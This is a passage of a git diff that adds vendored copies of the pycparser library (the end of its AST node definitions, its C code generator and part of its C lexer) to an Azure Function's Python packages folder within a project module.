+ self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('declname', 'quals', 'align', ) + +class Typedef(Node): + __slots__ = ('name', 'quals', 'storage', 'type', 'coord', '__weakref__') + def __init__(self, name, quals, storage, type, coord=None): + self.name = name + self.quals = quals + self.storage = storage + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('name', 'quals', 'storage', ) + +class Typename(Node): + __slots__ = ('name', 'quals', 'align', 'type', 'coord', '__weakref__') + def __init__(self, name, quals, align, type, coord=None): + self.name = name + self.quals = quals + self.align = align + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield 
self.type + + attr_names = ('name', 'quals', 'align', ) + +class UnaryOp(Node): + __slots__ = ('op', 'expr', 'coord', '__weakref__') + def __init__(self, op, expr, coord=None): + self.op = op + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + + attr_names = ('op', ) + +class Union(Node): + __slots__ = ('name', 'decls', 'coord', '__weakref__') + def __init__(self, name, decls, coord=None): + self.name = name + self.decls = decls + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = ('name', ) + +class While(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class Pragma(Node): + __slots__ = ('string', 'coord', '__weakref__') + def __init__(self, string, coord=None): + self.string = string + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('string', ) + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py new file mode 100644 index 0000000..0d266bc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_generator.py @@ -0,0 +1,502 @@ +#------------------------------------------------------------------------------ +# pycparser: c_generator.py +# +# C code generator from pycparser AST nodes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +from . import c_ast + + +class CGenerator(object): + """ Uses the same visitor pattern as c_ast.NodeVisitor, but modified to + return a value from each visit method, using string accumulation in + generic_visit. + """ + def __init__(self, reduce_parentheses=False): + """ Constructs C-code generator + + reduce_parentheses: + if True, eliminates needless parentheses on binary operators + """ + # Statements start with indentation of self.indent_level spaces, using + # the _make_indent method. 
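+        # Typical round-trip (a sketch; 'example.c' is an assumed,
+        # already-preprocessed input file):
+        #     from pycparser import parse_file
+        #     from pycparser.c_generator import CGenerator
+        #     ast = parse_file('example.c')
+        #     print(CGenerator().visit(ast))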
+ self.indent_level = 0 + self.reduce_parentheses = reduce_parentheses + + def _make_indent(self): + return ' ' * self.indent_level + + def visit(self, node): + method = 'visit_' + node.__class__.__name__ + return getattr(self, method, self.generic_visit)(node) + + def generic_visit(self, node): + if node is None: + return '' + else: + return ''.join(self.visit(c) for c_name, c in node.children()) + + def visit_Constant(self, n): + return n.value + + def visit_ID(self, n): + return n.name + + def visit_Pragma(self, n): + ret = '#pragma' + if n.string: + ret += ' ' + n.string + return ret + + def visit_ArrayRef(self, n): + arrref = self._parenthesize_unless_simple(n.name) + return arrref + '[' + self.visit(n.subscript) + ']' + + def visit_StructRef(self, n): + sref = self._parenthesize_unless_simple(n.name) + return sref + n.type + self.visit(n.field) + + def visit_FuncCall(self, n): + fref = self._parenthesize_unless_simple(n.name) + return fref + '(' + self.visit(n.args) + ')' + + def visit_UnaryOp(self, n): + if n.op == 'sizeof': + # Always parenthesize the argument of sizeof since it can be + # a name. + return 'sizeof(%s)' % self.visit(n.expr) + else: + operand = self._parenthesize_unless_simple(n.expr) + if n.op == 'p++': + return '%s++' % operand + elif n.op == 'p--': + return '%s--' % operand + else: + return '%s%s' % (n.op, operand) + + # Precedence map of binary operators: + precedence_map = { + # Should be in sync with c_parser.CParser.precedence + # Higher numbers are stronger binding + '||': 0, # weakest binding + '&&': 1, + '|': 2, + '^': 3, + '&': 4, + '==': 5, '!=': 5, + '>': 6, '>=': 6, '<': 6, '<=': 6, + '>>': 7, '<<': 7, + '+': 8, '-': 8, + '*': 9, '/': 9, '%': 9 # strongest binding + } + + def visit_BinaryOp(self, n): + # Note: all binary operators are left-to-right associative + # + # If `n.left.op` has a stronger or equally binding precedence in + # comparison to `n.op`, no parenthesis are needed for the left: + # e.g., `(a*b) + c` is equivalent to `a*b + c`, as well as + # `(a+b) - c` is equivalent to `a+b - c` (same precedence). + # If the left operator is weaker binding than the current, then + # parentheses are necessary: + # e.g., `(a+b) * c` is NOT equivalent to `a+b * c`. + lval_str = self._parenthesize_if( + n.left, + lambda d: not (self._is_simple_node(d) or + self.reduce_parentheses and isinstance(d, c_ast.BinaryOp) and + self.precedence_map[d.op] >= self.precedence_map[n.op])) + # If `n.right.op` has a stronger -but not equal- binding precedence, + # parenthesis can be omitted on the right: + # e.g., `a + (b*c)` is equivalent to `a + b*c`. + # If the right operator is weaker or equally binding, then parentheses + # are necessary: + # e.g., `a * (b+c)` is NOT equivalent to `a * b+c` and + # `a - (b+c)` is NOT equivalent to `a - b+c` (same precedence). 
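+        # Concretely (a sketch): with reduce_parentheses=True an AST for
+        # `(a + b) - c` is emitted as `a + b - c` (the left test uses >=),
+        # while `a - (b + c)` keeps its parentheses (the right test uses >).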
+ rval_str = self._parenthesize_if( + n.right, + lambda d: not (self._is_simple_node(d) or + self.reduce_parentheses and isinstance(d, c_ast.BinaryOp) and + self.precedence_map[d.op] > self.precedence_map[n.op])) + return '%s %s %s' % (lval_str, n.op, rval_str) + + def visit_Assignment(self, n): + rval_str = self._parenthesize_if( + n.rvalue, + lambda n: isinstance(n, c_ast.Assignment)) + return '%s %s %s' % (self.visit(n.lvalue), n.op, rval_str) + + def visit_IdentifierType(self, n): + return ' '.join(n.names) + + def _visit_expr(self, n): + if isinstance(n, c_ast.InitList): + return '{' + self.visit(n) + '}' + elif isinstance(n, c_ast.ExprList): + return '(' + self.visit(n) + ')' + else: + return self.visit(n) + + def visit_Decl(self, n, no_type=False): + # no_type is used when a Decl is part of a DeclList, where the type is + # explicitly only for the first declaration in a list. + # + s = n.name if no_type else self._generate_decl(n) + if n.bitsize: s += ' : ' + self.visit(n.bitsize) + if n.init: + s += ' = ' + self._visit_expr(n.init) + return s + + def visit_DeclList(self, n): + s = self.visit(n.decls[0]) + if len(n.decls) > 1: + s += ', ' + ', '.join(self.visit_Decl(decl, no_type=True) + for decl in n.decls[1:]) + return s + + def visit_Typedef(self, n): + s = '' + if n.storage: s += ' '.join(n.storage) + ' ' + s += self._generate_type(n.type) + return s + + def visit_Cast(self, n): + s = '(' + self._generate_type(n.to_type, emit_declname=False) + ')' + return s + ' ' + self._parenthesize_unless_simple(n.expr) + + def visit_ExprList(self, n): + visited_subexprs = [] + for expr in n.exprs: + visited_subexprs.append(self._visit_expr(expr)) + return ', '.join(visited_subexprs) + + def visit_InitList(self, n): + visited_subexprs = [] + for expr in n.exprs: + visited_subexprs.append(self._visit_expr(expr)) + return ', '.join(visited_subexprs) + + def visit_Enum(self, n): + return self._generate_struct_union_enum(n, name='enum') + + def visit_Alignas(self, n): + return '_Alignas({})'.format(self.visit(n.alignment)) + + def visit_Enumerator(self, n): + if not n.value: + return '{indent}{name},\n'.format( + indent=self._make_indent(), + name=n.name, + ) + else: + return '{indent}{name} = {value},\n'.format( + indent=self._make_indent(), + name=n.name, + value=self.visit(n.value), + ) + + def visit_FuncDef(self, n): + decl = self.visit(n.decl) + self.indent_level = 0 + body = self.visit(n.body) + if n.param_decls: + knrdecls = ';\n'.join(self.visit(p) for p in n.param_decls) + return decl + '\n' + knrdecls + ';\n' + body + '\n' + else: + return decl + '\n' + body + '\n' + + def visit_FileAST(self, n): + s = '' + for ext in n.ext: + if isinstance(ext, c_ast.FuncDef): + s += self.visit(ext) + elif isinstance(ext, c_ast.Pragma): + s += self.visit(ext) + '\n' + else: + s += self.visit(ext) + ';\n' + return s + + def visit_Compound(self, n): + s = self._make_indent() + '{\n' + self.indent_level += 2 + if n.block_items: + s += ''.join(self._generate_stmt(stmt) for stmt in n.block_items) + self.indent_level -= 2 + s += self._make_indent() + '}\n' + return s + + def visit_CompoundLiteral(self, n): + return '(' + self.visit(n.type) + '){' + self.visit(n.init) + '}' + + + def visit_EmptyStatement(self, n): + return ';' + + def visit_ParamList(self, n): + return ', '.join(self.visit(param) for param in n.params) + + def visit_Return(self, n): + s = 'return' + if n.expr: s += ' ' + self.visit(n.expr) + return s + ';' + + def visit_Break(self, n): + return 'break;' + + def visit_Continue(self, n): + 
return 'continue;' + + def visit_TernaryOp(self, n): + s = '(' + self._visit_expr(n.cond) + ') ? ' + s += '(' + self._visit_expr(n.iftrue) + ') : ' + s += '(' + self._visit_expr(n.iffalse) + ')' + return s + + def visit_If(self, n): + s = 'if (' + if n.cond: s += self.visit(n.cond) + s += ')\n' + s += self._generate_stmt(n.iftrue, add_indent=True) + if n.iffalse: + s += self._make_indent() + 'else\n' + s += self._generate_stmt(n.iffalse, add_indent=True) + return s + + def visit_For(self, n): + s = 'for (' + if n.init: s += self.visit(n.init) + s += ';' + if n.cond: s += ' ' + self.visit(n.cond) + s += ';' + if n.next: s += ' ' + self.visit(n.next) + s += ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_While(self, n): + s = 'while (' + if n.cond: s += self.visit(n.cond) + s += ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_DoWhile(self, n): + s = 'do\n' + s += self._generate_stmt(n.stmt, add_indent=True) + s += self._make_indent() + 'while (' + if n.cond: s += self.visit(n.cond) + s += ');' + return s + + def visit_StaticAssert(self, n): + s = '_Static_assert(' + s += self.visit(n.cond) + if n.message: + s += ',' + s += self.visit(n.message) + s += ')' + return s + + def visit_Switch(self, n): + s = 'switch (' + self.visit(n.cond) + ')\n' + s += self._generate_stmt(n.stmt, add_indent=True) + return s + + def visit_Case(self, n): + s = 'case ' + self.visit(n.expr) + ':\n' + for stmt in n.stmts: + s += self._generate_stmt(stmt, add_indent=True) + return s + + def visit_Default(self, n): + s = 'default:\n' + for stmt in n.stmts: + s += self._generate_stmt(stmt, add_indent=True) + return s + + def visit_Label(self, n): + return n.name + ':\n' + self._generate_stmt(n.stmt) + + def visit_Goto(self, n): + return 'goto ' + n.name + ';' + + def visit_EllipsisParam(self, n): + return '...' + + def visit_Struct(self, n): + return self._generate_struct_union_enum(n, 'struct') + + def visit_Typename(self, n): + return self._generate_type(n.type) + + def visit_Union(self, n): + return self._generate_struct_union_enum(n, 'union') + + def visit_NamedInitializer(self, n): + s = '' + for name in n.name: + if isinstance(name, c_ast.ID): + s += '.' + name.name + else: + s += '[' + self.visit(name) + ']' + s += ' = ' + self._visit_expr(n.expr) + return s + + def visit_FuncDecl(self, n): + return self._generate_type(n) + + def visit_ArrayDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def visit_TypeDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def visit_PtrDecl(self, n): + return self._generate_type(n, emit_declname=False) + + def _generate_struct_union_enum(self, n, name): + """ Generates code for structs, unions, and enums. name should be + 'struct', 'union', or 'enum'. 
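+
+            For example (a sketch): a Struct node with decls=None regenerates
+            as just `struct tag`, while decls=[] produces `struct tag` with an
+            empty brace-enclosed body.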
+ """ + if name in ('struct', 'union'): + members = n.decls + body_function = self._generate_struct_union_body + else: + assert name == 'enum' + members = None if n.values is None else n.values.enumerators + body_function = self._generate_enum_body + s = name + ' ' + (n.name or '') + if members is not None: + # None means no members + # Empty sequence means an empty list of members + s += '\n' + s += self._make_indent() + self.indent_level += 2 + s += '{\n' + s += body_function(members) + self.indent_level -= 2 + s += self._make_indent() + '}' + return s + + def _generate_struct_union_body(self, members): + return ''.join(self._generate_stmt(decl) for decl in members) + + def _generate_enum_body(self, members): + # `[:-2] + '\n'` removes the final `,` from the enumerator list + return ''.join(self.visit(value) for value in members)[:-2] + '\n' + + def _generate_stmt(self, n, add_indent=False): + """ Generation from a statement node. This method exists as a wrapper + for individual visit_* methods to handle different treatment of + some statements in this context. + """ + typ = type(n) + if add_indent: self.indent_level += 2 + indent = self._make_indent() + if add_indent: self.indent_level -= 2 + + if typ in ( + c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp, + c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef, + c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef, + c_ast.ExprList): + # These can also appear in an expression context so no semicolon + # is added to them automatically + # + return indent + self.visit(n) + ';\n' + elif typ in (c_ast.Compound,): + # No extra indentation required before the opening brace of a + # compound - because it consists of multiple lines it has to + # compute its own indentation. + # + return self.visit(n) + elif typ in (c_ast.If,): + return indent + self.visit(n) + else: + return indent + self.visit(n) + '\n' + + def _generate_decl(self, n): + """ Generation from a Decl node. + """ + s = '' + if n.funcspec: s = ' '.join(n.funcspec) + ' ' + if n.storage: s += ' '.join(n.storage) + ' ' + if n.align: s += self.visit(n.align[0]) + ' ' + s += self._generate_type(n.type) + return s + + def _generate_type(self, n, modifiers=[], emit_declname = True): + """ Recursive generation from a type node. n is the type node. + modifiers collects the PtrDecl, ArrayDecl and FuncDecl modifiers + encountered on the way down to a TypeDecl, to allow proper + generation from it. + """ + typ = type(n) + #~ print(n, modifiers) + + if typ == c_ast.TypeDecl: + s = '' + if n.quals: s += ' '.join(n.quals) + ' ' + s += self.visit(n.type) + + nstr = n.declname if n.declname and emit_declname else '' + # Resolve modifiers. + # Wrap in parens to distinguish pointer to array and pointer to + # function syntax. 
+ # + for i, modifier in enumerate(modifiers): + if isinstance(modifier, c_ast.ArrayDecl): + if (i != 0 and + isinstance(modifiers[i - 1], c_ast.PtrDecl)): + nstr = '(' + nstr + ')' + nstr += '[' + if modifier.dim_quals: + nstr += ' '.join(modifier.dim_quals) + ' ' + nstr += self.visit(modifier.dim) + ']' + elif isinstance(modifier, c_ast.FuncDecl): + if (i != 0 and + isinstance(modifiers[i - 1], c_ast.PtrDecl)): + nstr = '(' + nstr + ')' + nstr += '(' + self.visit(modifier.args) + ')' + elif isinstance(modifier, c_ast.PtrDecl): + if modifier.quals: + nstr = '* %s%s' % (' '.join(modifier.quals), + ' ' + nstr if nstr else '') + else: + nstr = '*' + nstr + if nstr: s += ' ' + nstr + return s + elif typ == c_ast.Decl: + return self._generate_decl(n.type) + elif typ == c_ast.Typename: + return self._generate_type(n.type, emit_declname = emit_declname) + elif typ == c_ast.IdentifierType: + return ' '.join(n.names) + ' ' + elif typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl): + return self._generate_type(n.type, modifiers + [n], + emit_declname = emit_declname) + else: + return self.visit(n) + + def _parenthesize_if(self, n, condition): + """ Visits 'n' and returns its string representation, parenthesized + if the condition function applied to the node returns True. + """ + s = self._visit_expr(n) + if condition(n): + return '(' + s + ')' + else: + return s + + def _parenthesize_unless_simple(self, n): + """ Common use case for _parenthesize_if + """ + return self._parenthesize_if(n, lambda d: not self._is_simple_node(d)) + + def _is_simple_node(self, n): + """ Returns True for nodes that are "simple" - i.e. nodes that always + have higher precedence than operators. + """ + return isinstance(n, (c_ast.Constant, c_ast.ID, c_ast.ArrayRef, + c_ast.StructRef, c_ast.FuncCall)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py new file mode 100644 index 0000000..c33212f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_lexer.py @@ -0,0 +1,554 @@ +#------------------------------------------------------------------------------ +# pycparser: c_lexer.py +# +# CLexer class: lexer for the C language +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ +import re + +from .ply import lex +from .ply.lex import TOKEN + + +class CLexer(object): + """ A lexer for the C language. After building it, set the + input text with input(), and call token() to get new + tokens. + + The public attribute filename can be set to an initial + filename, but the lexer will update it upon #line + directives. + """ + def __init__(self, error_func, on_lbrace_func, on_rbrace_func, + type_lookup_func): + """ Create a new Lexer. + + error_func: + An error function. Will be called with an error + message, line and column as arguments, in case of + an error during lexing. + + on_lbrace_func, on_rbrace_func: + Called when an LBRACE or RBRACE is encountered + (likely to push/pop type_lookup_func's scope) + + type_lookup_func: + A type lookup function. Given a string, it must + return True IFF this string is a name of a type + that was defined with a typedef earlier. 
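+
+                For example (an illustrative sketch), a minimal lookup
+                could be:
+                    lambda name: name in {'size_t', 'uint32_t'}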
+ """ + self.error_func = error_func + self.on_lbrace_func = on_lbrace_func + self.on_rbrace_func = on_rbrace_func + self.type_lookup_func = type_lookup_func + self.filename = '' + + # Keeps track of the last token returned from self.token() + self.last_token = None + + # Allow either "# line" or "# " to support GCC's + # cpp output + # + self.line_pattern = re.compile(r'([ \t]*line\W)|([ \t]*\d+)') + self.pragma_pattern = re.compile(r'[ \t]*pragma\W') + + def build(self, **kwargs): + """ Builds the lexer from the specification. Must be + called after the lexer object is created. + + This method exists separately, because the PLY + manual warns against calling lex.lex inside + __init__ + """ + self.lexer = lex.lex(object=self, **kwargs) + + def reset_lineno(self): + """ Resets the internal line number counter of the lexer. + """ + self.lexer.lineno = 1 + + def input(self, text): + self.lexer.input(text) + + def token(self): + self.last_token = self.lexer.token() + return self.last_token + + def find_tok_column(self, token): + """ Find the column of the token in its line. + """ + last_cr = self.lexer.lexdata.rfind('\n', 0, token.lexpos) + return token.lexpos - last_cr + + ######################-- PRIVATE --###################### + + ## + ## Internal auxiliary methods + ## + def _error(self, msg, token): + location = self._make_tok_location(token) + self.error_func(msg, location[0], location[1]) + self.lexer.skip(1) + + def _make_tok_location(self, token): + return (token.lineno, self.find_tok_column(token)) + + ## + ## Reserved keywords + ## + keywords = ( + 'AUTO', 'BREAK', 'CASE', 'CHAR', 'CONST', + 'CONTINUE', 'DEFAULT', 'DO', 'DOUBLE', 'ELSE', 'ENUM', 'EXTERN', + 'FLOAT', 'FOR', 'GOTO', 'IF', 'INLINE', 'INT', 'LONG', + 'REGISTER', 'OFFSETOF', + 'RESTRICT', 'RETURN', 'SHORT', 'SIGNED', 'SIZEOF', 'STATIC', 'STRUCT', + 'SWITCH', 'TYPEDEF', 'UNION', 'UNSIGNED', 'VOID', + 'VOLATILE', 'WHILE', '__INT128', + ) + + keywords_new = ( + '_BOOL', '_COMPLEX', + '_NORETURN', '_THREAD_LOCAL', '_STATIC_ASSERT', + '_ATOMIC', '_ALIGNOF', '_ALIGNAS', + ) + + keyword_map = {} + + for keyword in keywords: + keyword_map[keyword.lower()] = keyword + + for keyword in keywords_new: + keyword_map[keyword[:2].upper() + keyword[2:].lower()] = keyword + + ## + ## All the tokens recognized by the lexer + ## + tokens = keywords + keywords_new + ( + # Identifiers + 'ID', + + # Type identifiers (identifiers previously defined as + # types with typedef) + 'TYPEID', + + # constants + 'INT_CONST_DEC', 'INT_CONST_OCT', 'INT_CONST_HEX', 'INT_CONST_BIN', 'INT_CONST_CHAR', + 'FLOAT_CONST', 'HEX_FLOAT_CONST', + 'CHAR_CONST', + 'WCHAR_CONST', + 'U8CHAR_CONST', + 'U16CHAR_CONST', + 'U32CHAR_CONST', + + # String literals + 'STRING_LITERAL', + 'WSTRING_LITERAL', + 'U8STRING_LITERAL', + 'U16STRING_LITERAL', + 'U32STRING_LITERAL', + + # Operators + 'PLUS', 'MINUS', 'TIMES', 'DIVIDE', 'MOD', + 'OR', 'AND', 'NOT', 'XOR', 'LSHIFT', 'RSHIFT', + 'LOR', 'LAND', 'LNOT', + 'LT', 'LE', 'GT', 'GE', 'EQ', 'NE', + + # Assignment + 'EQUALS', 'TIMESEQUAL', 'DIVEQUAL', 'MODEQUAL', + 'PLUSEQUAL', 'MINUSEQUAL', + 'LSHIFTEQUAL','RSHIFTEQUAL', 'ANDEQUAL', 'XOREQUAL', + 'OREQUAL', + + # Increment/decrement + 'PLUSPLUS', 'MINUSMINUS', + + # Structure dereference (->) + 'ARROW', + + # Conditional operator (?) + 'CONDOP', + + # Delimiters + 'LPAREN', 'RPAREN', # ( ) + 'LBRACKET', 'RBRACKET', # [ ] + 'LBRACE', 'RBRACE', # { } + 'COMMA', 'PERIOD', # . , + 'SEMI', 'COLON', # ; : + + # Ellipsis (...) 
+ 'ELLIPSIS', + + # pre-processor + 'PPHASH', # '#' + 'PPPRAGMA', # 'pragma' + 'PPPRAGMASTR', + ) + + ## + ## Regexes for use in tokens + ## + ## + + # valid C identifiers (K&R2: A.2.3), plus '$' (supported by some compilers) + identifier = r'[a-zA-Z_$][0-9a-zA-Z_$]*' + + hex_prefix = '0[xX]' + hex_digits = '[0-9a-fA-F]+' + bin_prefix = '0[bB]' + bin_digits = '[01]+' + + # integer constants (K&R2: A.2.5.1) + integer_suffix_opt = r'(([uU]ll)|([uU]LL)|(ll[uU]?)|(LL[uU]?)|([uU][lL])|([lL][uU]?)|[uU])?' + decimal_constant = '(0'+integer_suffix_opt+')|([1-9][0-9]*'+integer_suffix_opt+')' + octal_constant = '0[0-7]*'+integer_suffix_opt + hex_constant = hex_prefix+hex_digits+integer_suffix_opt + bin_constant = bin_prefix+bin_digits+integer_suffix_opt + + bad_octal_constant = '0[0-7]*[89]' + + # character constants (K&R2: A.2.5.2) + # Note: a-zA-Z and '.-~^_!=&;,' are allowed as escape chars to support #line + # directives with Windows paths as filenames (..\..\dir\file) + # For the same reason, decimal_escape allows all digit sequences. We want to + # parse all correct code, even if it means to sometimes parse incorrect + # code. + # + # The original regexes were taken verbatim from the C syntax definition, + # and were later modified to avoid worst-case exponential running time. + # + # simple_escape = r"""([a-zA-Z._~!=&\^\-\\?'"])""" + # decimal_escape = r"""(\d+)""" + # hex_escape = r"""(x[0-9a-fA-F]+)""" + # bad_escape = r"""([\\][^a-zA-Z._~^!=&\^\-\\?'"x0-7])""" + # + # The following modifications were made to avoid the ambiguity that allowed backtracking: + # (https://github.com/eliben/pycparser/issues/61) + # + # - \x was removed from simple_escape, unless it was not followed by a hex digit, to avoid ambiguity with hex_escape. + # - hex_escape allows one or more hex characters, but requires that the next character(if any) is not hex + # - decimal_escape allows one or more decimal characters, but requires that the next character(if any) is not a decimal + # - bad_escape does not allow any decimals (8-9), to avoid conflicting with the permissive decimal_escape. + # + # Without this change, python's `re` module would recursively try parsing each ambiguous escape sequence in multiple ways. + # e.g. `\123` could be parsed as `\1`+`23`, `\12`+`3`, and `\123`. 
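
A minimal standalone check of the lookahead fix described above, using the same
two patterns defined just below (a hedged illustration; only the standard `re`
module is assumed):

    import re

    decimal_escape = r"""(\d+)(?!\d)"""
    hex_escape = r"""(x[0-9a-fA-F]+)(?![0-9a-fA-F])"""

    # Each escape now has exactly one parse: the pattern refuses to stop
    # while more characters of the same class remain.
    assert re.match(decimal_escape, "123").group(0) == "123"
    assert re.match(hex_escape, "x41z").group(0) == "x41"
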
+ + simple_escape = r"""([a-wyzA-Z._~!=&\^\-\\?'"]|x(?![0-9a-fA-F]))""" + decimal_escape = r"""(\d+)(?!\d)""" + hex_escape = r"""(x[0-9a-fA-F]+)(?![0-9a-fA-F])""" + bad_escape = r"""([\\][^a-zA-Z._~^!=&\^\-\\?'"x0-9])""" + + escape_sequence = r"""(\\("""+simple_escape+'|'+decimal_escape+'|'+hex_escape+'))' + + # This complicated regex with lookahead might be slow for strings, so because all of the valid escapes (including \x) allowed + # 0 or more non-escaped characters after the first character, simple_escape+decimal_escape+hex_escape got simplified to + + escape_sequence_start_in_string = r"""(\\[0-9a-zA-Z._~!=&\^\-\\?'"])""" + + cconst_char = r"""([^'\\\n]|"""+escape_sequence+')' + char_const = "'"+cconst_char+"'" + wchar_const = 'L'+char_const + u8char_const = 'u8'+char_const + u16char_const = 'u'+char_const + u32char_const = 'U'+char_const + multicharacter_constant = "'"+cconst_char+"{2,4}'" + unmatched_quote = "('"+cconst_char+"*\\n)|('"+cconst_char+"*$)" + bad_char_const = r"""('"""+cconst_char+"""[^'\n]+')|('')|('"""+bad_escape+r"""[^'\n]*')""" + + # string literals (K&R2: A.2.6) + string_char = r"""([^"\\\n]|"""+escape_sequence_start_in_string+')' + string_literal = '"'+string_char+'*"' + wstring_literal = 'L'+string_literal + u8string_literal = 'u8'+string_literal + u16string_literal = 'u'+string_literal + u32string_literal = 'U'+string_literal + bad_string_literal = '"'+string_char+'*'+bad_escape+string_char+'*"' + + # floating constants (K&R2: A.2.5.3) + exponent_part = r"""([eE][-+]?[0-9]+)""" + fractional_constant = r"""([0-9]*\.[0-9]+)|([0-9]+\.)""" + floating_constant = '(((('+fractional_constant+')'+exponent_part+'?)|([0-9]+'+exponent_part+'))[FfLl]?)' + binary_exponent_part = r'''([pP][+-]?[0-9]+)''' + hex_fractional_constant = '((('+hex_digits+r""")?\."""+hex_digits+')|('+hex_digits+r"""\.))""" + hex_floating_constant = '('+hex_prefix+'('+hex_digits+'|'+hex_fractional_constant+')'+binary_exponent_part+'[FfLl]?)' + + ## + ## Lexer states: used for preprocessor \n-terminated directives + ## + states = ( + # ppline: preprocessor line directives + # + ('ppline', 'exclusive'), + + # pppragma: pragma + # + ('pppragma', 'exclusive'), + ) + + def t_PPHASH(self, t): + r'[ \t]*\#' + if self.line_pattern.match(t.lexer.lexdata, pos=t.lexer.lexpos): + t.lexer.begin('ppline') + self.pp_line = self.pp_filename = None + elif self.pragma_pattern.match(t.lexer.lexdata, pos=t.lexer.lexpos): + t.lexer.begin('pppragma') + else: + t.type = 'PPHASH' + return t + + ## + ## Rules for the ppline state + ## + @TOKEN(string_literal) + def t_ppline_FILENAME(self, t): + if self.pp_line is None: + self._error('filename before line number in #line', t) + else: + self.pp_filename = t.value.lstrip('"').rstrip('"') + + @TOKEN(decimal_constant) + def t_ppline_LINE_NUMBER(self, t): + if self.pp_line is None: + self.pp_line = t.value + else: + # Ignore: GCC's cpp sometimes inserts a numeric flag + # after the file name + pass + + def t_ppline_NEWLINE(self, t): + r'\n' + if self.pp_line is None: + self._error('line number missing in #line', t) + else: + self.lexer.lineno = int(self.pp_line) + + if self.pp_filename is not None: + self.filename = self.pp_filename + + t.lexer.begin('INITIAL') + + def t_ppline_PPLINE(self, t): + r'line' + pass + + t_ppline_ignore = ' \t' + + def t_ppline_error(self, t): + self._error('invalid #line directive', t) + + ## + ## Rules for the pppragma state + ## + def t_pppragma_NEWLINE(self, t): + r'\n' + t.lexer.lineno += 1 + t.lexer.begin('INITIAL') + + def 
t_pppragma_PPPRAGMA(self, t): + r'pragma' + return t + + t_pppragma_ignore = ' \t' + + def t_pppragma_STR(self, t): + '.+' + t.type = 'PPPRAGMASTR' + return t + + def t_pppragma_error(self, t): + self._error('invalid #pragma directive', t) + + ## + ## Rules for the normal state + ## + t_ignore = ' \t' + + # Newlines + def t_NEWLINE(self, t): + r'\n+' + t.lexer.lineno += t.value.count("\n") + + # Operators + t_PLUS = r'\+' + t_MINUS = r'-' + t_TIMES = r'\*' + t_DIVIDE = r'/' + t_MOD = r'%' + t_OR = r'\|' + t_AND = r'&' + t_NOT = r'~' + t_XOR = r'\^' + t_LSHIFT = r'<<' + t_RSHIFT = r'>>' + t_LOR = r'\|\|' + t_LAND = r'&&' + t_LNOT = r'!' + t_LT = r'<' + t_GT = r'>' + t_LE = r'<=' + t_GE = r'>=' + t_EQ = r'==' + t_NE = r'!=' + + # Assignment operators + t_EQUALS = r'=' + t_TIMESEQUAL = r'\*=' + t_DIVEQUAL = r'/=' + t_MODEQUAL = r'%=' + t_PLUSEQUAL = r'\+=' + t_MINUSEQUAL = r'-=' + t_LSHIFTEQUAL = r'<<=' + t_RSHIFTEQUAL = r'>>=' + t_ANDEQUAL = r'&=' + t_OREQUAL = r'\|=' + t_XOREQUAL = r'\^=' + + # Increment/decrement + t_PLUSPLUS = r'\+\+' + t_MINUSMINUS = r'--' + + # -> + t_ARROW = r'->' + + # ? + t_CONDOP = r'\?' + + # Delimiters + t_LPAREN = r'\(' + t_RPAREN = r'\)' + t_LBRACKET = r'\[' + t_RBRACKET = r'\]' + t_COMMA = r',' + t_PERIOD = r'\.' + t_SEMI = r';' + t_COLON = r':' + t_ELLIPSIS = r'\.\.\.' + + # Scope delimiters + # To see why on_lbrace_func is needed, consider: + # typedef char TT; + # void foo(int TT) { TT = 10; } + # TT x = 5; + # Outside the function, TT is a typedef, but inside (starting and ending + # with the braces) it's a parameter. The trouble begins with yacc's + # lookahead token. If we open a new scope in brace_open, then TT has + # already been read and incorrectly interpreted as TYPEID. So, we need + # to open and close scopes from within the lexer. + # Similar for the TT immediately outside the end of the function. 
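+    #
+    # Illustrative effect (editorial note, not part of the upstream comment):
+    # in the snippet above, on_lbrace_func pushes a scope in which TT is
+    # recorded as a plain identifier, and on_rbrace_func pops it, so the
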